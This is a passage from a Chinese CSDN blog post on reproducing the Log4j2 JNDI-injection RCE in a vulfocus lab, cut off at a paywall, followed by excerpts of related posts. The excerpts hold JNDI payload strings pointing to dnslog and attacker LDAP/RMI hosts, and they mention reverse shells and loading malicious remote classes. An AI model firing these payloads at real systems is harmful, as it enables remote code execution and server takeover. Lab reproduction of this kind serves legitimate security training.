vulfocus复现:log4j2-rce-2021-12-09

已于 2022-07-14 19:11:13 修改
阅读量5.2k 收藏 12
点赞数 5
分类专栏: 漏洞复现
于 2022-07-13 19:27:57 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/woai_zhongguo/article/details/125766913
版权

Apache Log4j2 RCE漏洞 JNDI注入 payload 安全防护
关键词由CSDN通过智能技术生成

漏洞影响:

Apache Log4j 是一个基于Java的日志记录工具。经过多年的开发迭代,Log4j 1.x的维护已经变得非常困难,因为它需要与非常旧的 Java 版本兼容,所以于 2015 年 8 月正式升级为Log4j2。黑客可以恶意构造特殊数据请求包payload触发漏洞,从而可以在目标服务器上执行任意代码,导致服务器被控制。

受影响版本:2.0-beta9 <= Apache Log4j <= 2.15.0-rc1

复现场景:

靶机:192.168.25.132

攻击机(kali):192.168.25.129

使用工具:

Base64在线编码工具

url在线编码工具

burpsuite

JNDI注入利用工具:JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar(生成JNDI链接并启动后端相关服务,可用于Fastjson、Jackson等相关漏洞的验证)

GitHub - welk1n/JNDI-Injection-Exploit: JNDI注入测试工具(A tool which generates JNDI links can start several servers to exploit JNDI Injection vulnerability,like Jackson,Fastjson,etc)

复现过程:

1.在靶机安装vulfocus,并下载镜像vulfocus/log4j2-rce-2021-12-09   //安装靶场平台https://github.com/fofapro/vulfocus

2.在首页启动靶场并访问靶场地址

最低0.47元/天 解锁文章
vulfocus/log4j2-rce-2021-12-09:latest通关
qq_44122254的博客
12-28 5283
别的大佬在漏洞出来后立马复现利用都学明白了,我这个菜鸟开始了 搜到了在vulfocus.fofa.io靶场有更新了,就在这里开始了学习 启动靶场 按照官方说的漏洞位置在/hello,漏洞变量是payload 按照官方说的在hello里面访问hello 查看漏洞是否存在,当然啦,这是靶场怎么会不存在呢,哈哈哈 证明漏洞存在的方式: dnslog地址 构造payload 执行之后看一下这边的解析记录,存在此漏洞 好了,继续靶场复现 漏洞存在后,进行反弹shell,进一步利用,这里用到了一个工具**JND
通过vulfocus靶场--复现log4j2漏洞
weixin_55843787的博客
05-11 3663
vulfocus靶场log4j2漏洞复现
用docker搭建的Vulfocus镜像管理界面没有镜像可以拉取解决办法
最新发布
Palpitate_LL的博客
02-13 967
ps:截止到今天2023.4.2,kali和vps的docker拉取的vulfocus镜像会有版本的区别,虽然都是拉取的最新版,vps上镜像为3个月以前,kali上为16个月以前,==所以在修改 views.py 文件时,可能会发现文件内容不一样==。版本不同也导致一键同步报错的解决办法在vps上可行,但是在kali上就不行#在开始操作之前,需要将用户切换为root用户૮(˶ᴖ ᴗ ᴖ˶)ა,当kali和vps上出现不同操作时我会分开说,那么现在让我们开始。
log4j2-rce-2021-12-09漏洞原理及复现
加油~
07-28 1486
${jndi:ldap://${6666}.6666.dnslog.cn}你懂得~
JNDI(Java Naming and Directory Interface,Java命名和目录接口)
dengjuanshou7445的博客
08-26 351
JNDI(Java Naming and Directory Interface,Java命名和目录接口)是SUN公司提供的一种标准的Java命名系统接口,JNDI提供统一的客户端API,通过不同的访问提供者接口JNDI服务供应接口(SPI)的实现,由管理者将JNDI API映射为特定的命名服务和目录系统,使得Java应用程序可以和这些命名服务和目录服务之间进行交互。目录服务是命名服务的...
RabbitMQ【部署 01】一篇学会RabbitMQ服务依赖的下载安装及简单使用(首次登录 User can only log in via localhost 问题处理)(1)
2301_77121488的博客
05-08 1119
也可以直接安装rabbitmq-server从报错信息里获取需要的版本,由于是同一个网站,下载的方式是一样的,这次也是直接下载安装文件。,朋友们如果有需要全套《网络安全入门+黑客进阶学习资源包》,可以扫描下方二维码领取(如遇扫码问题,可以在评论区留言领取哦)~此时服务已经可以使用了,但是,默认情况下,RabbitMQ是没有安装WEB端插件的,需要手动积获才可以生效。点击下载,可以进行联网下载安装也可以直接进行下载,本次选择直接下载安装文件。因篇幅有限,仅展示部分资料。还有大家最喜欢的黑客技术。
log4j2-rce漏洞复现(CVE-2021-44228)
Z_l123的博客
04-01 2336
漏洞介绍 Apache Log4j2是一个Java的日志组件,在特定的版本中由于其启用了lookup功能,从而导致产生远程代码执行漏洞。 影响版本:Apache Log4j2 2.0-beta9 - 2.15.0(不包括安全版本 2.12.22.12.3 和 2.3.1) 漏洞编号:CVE-2021-44228 漏洞复现 利用vulfocus搭建并启动靶场 DNSLog验证 通过DNSLog Platform平台获取到域名skvgq7.dnslog.cn,构造payload:${jndi
vulhub复现CVE-2021-44228log4j漏洞
weixin_48878440的博客
12-12 1063
vulhub复现cve-2021-44228 log4j漏洞
log4j2 RCE漏洞复现(1)
2401_84300859的博客
05-17 593
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!内容实在太多,不一一截图了。
安全攻防实验-4】Vulfocus练习-log4j2攻击准备
qq_26579613的博客
02-08 1275
1、环境准备 2、工具准备 2.1安装JNDI-Injection-Exploit git clone https://github.com/welk1n/JNDI-Injection-Exploit.git 2.2 安装MVN mkdip -p /usr/local/apache-maven cd /usr/local/apache-maven wget -c https://dlcdn.apache.org/maven/maven-3/3.8.4/bin...
Vulfocus靶场漏洞复现系列—1
tlovejr的博客
03-02 6327
文章目录 前言 一、pandas是什么? 二、使用步骤 总结 前言 接下来会给大家介绍一些最常见的复现漏洞过程,我所用的是Vulfocus靶场靶场安装方法已经在上一篇文章讲过,大家可以自行去观看。如果大家想及时获取最新漏洞消息,大家可以直接cnvdhttps://www.cnvd.org.cn/去查看即可,小白入门,如果在博客中有什么错误,还请各位大佬指出。 一、Drupal远程代码执行漏(CVE-2019-6340) 1、漏洞介绍 Drupal官方之前更新了一个非常关键的安全补丁,
Log4j2远程命令执行复现CVE-2021-12-09
qq_55213436的博客
03-21 594
Log4j2是基于log4j这个java日志处理组件进行二次开发和改进而来的。也是目前最常用的日志框架之一,在之前的博客中()我们阐述了漏洞的原理和大致的利用方法。今天就借助dockers拉取vulfocus上的漏洞环境进行漏洞复现和利用的介绍。
Vulfocus漏洞复现】spring-core-rce-2022-03-29
weixin_45632448的博客
04-15 5823
2022年3月30日,Spring框架曝出RCE 0day漏洞,国家信息安全漏洞共享平台(CNVD)已收录了Spring框架远程命令执行漏洞(CNVD-2022-23942),考虑到Spring框架的广泛应用,漏洞被评级为危险。 通过该漏洞可写入webshell以及命令执行。在Spring框架的JDK9版本(及以上版本)中,远程攻击者可在满足特定条件的基础上,通过框架的参数绑定功能获取AccessLogValve对象并诸如恶意字段值,从而触发pipeline机制并写入任意路径下的文件。 漏洞利用条件 1、A
本地搭建vulfocus靶场&复现log4j2漏洞
xhscxj的博客
09-10 2152
环境用的是linux下的centos1.首先需要在centos中安装docker环境3.下载vulfocus镜像4.映射到centos中5.完成后访问centos的ip即可。
202212月最新)最详细vulfocus靶场 Log4j2远程命令执行漏洞复现
qq1140037586的博客
12-15 1251
1、向目标发送指定payload,目标对payload进行解析执行,然后会通过ldap链接远程服务,当ldap服务收到请求之后,将请求进行重定向到恶意 java class的地址。 2、目标服务器收到重定向请求之后,下载恶意class并执行其中的代码,从而执行系统命令。
Vulfocus-Redis漏洞复现(特征识别+自动化测试项目)
qq_68064663的博客
11-15 832
Vulfocus-Redis漏洞复现(特征识别+自动化测试项目)
Vulhub靶场-Log4j2
weixin_69010236的博客
01-24 1360
当日志中包含 ${},lookup就会去解析括号里面的内容,如:攻击payload:${jndi:rmi:192.168.96.1:1099/wqiyua} 当lookup解析到jndi时,就会调用jndi并利用rmi,执行攻击机jndi服务下的class文件并执行,从而造成任意命令执行漏洞
log4j 2.15.0-rc2版本发布:漏洞与核心jar包更新
3. log4j-1.2-api-2.15.0-rc2.jar:尽管Log4j 2Log4j 1.x在内部实现上有很大差异,但这个jar包提供了与Log4j 1.2 API的兼容性接口,使得基于Log4j 1.x的旧代码可以在Log4j 2框架上平滑迁移和运行。 4. log4j-jul-...
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值